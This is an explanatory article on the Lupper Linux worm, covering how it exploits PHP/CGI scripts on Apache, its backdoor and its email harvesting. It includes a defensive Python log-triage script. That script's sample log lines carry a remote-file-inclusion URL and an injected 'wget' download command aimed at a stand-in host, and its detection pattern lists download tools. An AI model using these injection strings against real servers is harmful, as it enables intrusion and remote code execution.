Lupper Worm 101
Malicious coders are very persistent these days. Windows is no longer alone in being attacked: attackers have recently learned to exploit systems such as Mac OS X and Linux, platforms known for their high level of security. Many of these attacks have been virus programs that take advantage of vulnerabilities in XML-RPC for PHP, a widely used open-source component found in many web-based applications.
Applications vulnerable to the newer viral strains include b2evolution, Drupal, PHPGroupWare, PostNuke, Tiki Wiki, WordPress and Xoops. While most of these applications have been updated to address the vulnerabilities, unpatched Linux systems remain vulnerable to Linux.Plupii, more commonly known as the Lupper worm.
How the Worm Functions
The Lupper worm spreads by exploiting Apache web servers that run PHP/CGI scripts, a class of scripts known to be more vulnerable than others. This infection is considered a variant of the Linux Slapper and BSD Scalper worms because of its similar propagation techniques. It attacks a web server by transmitting malicious HTTP (Hypertext Transfer Protocol) requests to open ports. The worm downloads and executes itself when the targeted server is running vulnerable scripts at a particular URL. This is enabled by configurations that permit remote file downloads in PHP/CGI and the execution of external shell commands. Its most alarming function is creating a backdoor on the compromised server. The worm then generates URLs and initiates a scan to seek out other machines to infect. Additionally, the Lupper worm has the ability to harvest email addresses.
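As an added example (not code from the original article or from any vendor), the following Python triage script flags Apache access-log lines that have the shape described above: requests to PHP/CGI scripts whose parameters carry a remote file URL or a shell-command fragment. The log lines, paths and addresses are constructed, and the script extensions and keyword list are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format: host ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The script types the article names as targets: PHP and CGI (.cgi/.pl assumed as common CGI extensions).
SCRIPT_RE = re.compile(r'\.(php|cgi|pl)(\?|$)', re.IGNORECASE)
# A parameter whose value is itself a URL has the shape of a remote file download.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Shell metacharacters or download utilities in a parameter value suggest an attempt
# to run an external shell command (heuristic; expect some false positives).
SHELL_RE = re.compile(r'[;|`]|\$\(|\b(wget|curl|lynx)\b', re.IGNORECASE)

# Constructed sample log lines (not real traffic; 198.51.100.0/24 is a documentation range).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Nov/2005:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla"',
    '10.0.0.9 - - [06/Nov/2005:10:00:02 +0000] "GET /cgi-bin/stats.pl?config=http://198.51.100.7/x.txt HTTP/1.1" 200 88 "-" "-"',
    '10.0.0.9 - - [06/Nov/2005:10:00:03 +0000] "GET /include.php?f=%3Bwget%20198.51.100.7/l HTTP/1.1" 500 0 "-" "-"',
]


def classify(line):
    """Return the reasons a log line matches the worm's request pattern (empty list = benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a parseable combined-format line
    target = m.group(3)
    if not SCRIPT_RE.search(target):
        return []  # only requests to PHP/CGI scripts are of interest here
    reasons = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        if REMOTE_URL_RE.match(value):
            reasons.append(f"remote file URL in parameter '{key}'")
        if SHELL_RE.search(value):
            reasons.append(f"shell command fragment in parameter '{key}'")
    return reasons


def scan(lines):
    """Map each suspicious line to its reasons, for log triage."""
    hits = {}
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits[line] = reasons
    return hits


if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LOG).items():
        print(line.split('"')[1], "->", "; ".join(reasons))
```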
Protecting against the Lupper Worm
Lupper was spotted rather quickly and doesn't seem to be spreading at the rate of the Slapper worm. Because worm exploits on Linux systems are rare in comparison to the Windows environment, security experts suggest that this malicious program is worth keeping an eye on. Representatives from McAfee state that Lupper's intent is to form a global network of compromised machines based on the peer-to-peer communication principle. Such a network is robust and capable of distributing DDoS (distributed denial-of-service) attacks and other exploits because it can be commanded remotely. The security vendor also fears that the worm's ability to extract email addresses may lead to new methods of infection.
The good thing is that most large corporations aren't running applications scripted in PHP/CGI. What may pose a continuous threat are unofficial sites established from within or outside an organization, and web hosting companies that use a variety of different scripts. Since the Lupper worm seems to use an IP-based method of propagation, it is less likely to locate servers using vulnerable scripts, limiting the chance of infection. This worm would be much more difficult to contain if it were distributed via infected hosts found in search engine results, a common trait of Windows-based malware.
Security experts have recommended many ways to deal with this infection; one is to grant only trusted users access to an FTP server. Symantec Corporation rates the Lupper worm as having a medium damage level and distribution rate. McAfee labeled it a low-risk threat for both home and corporate users.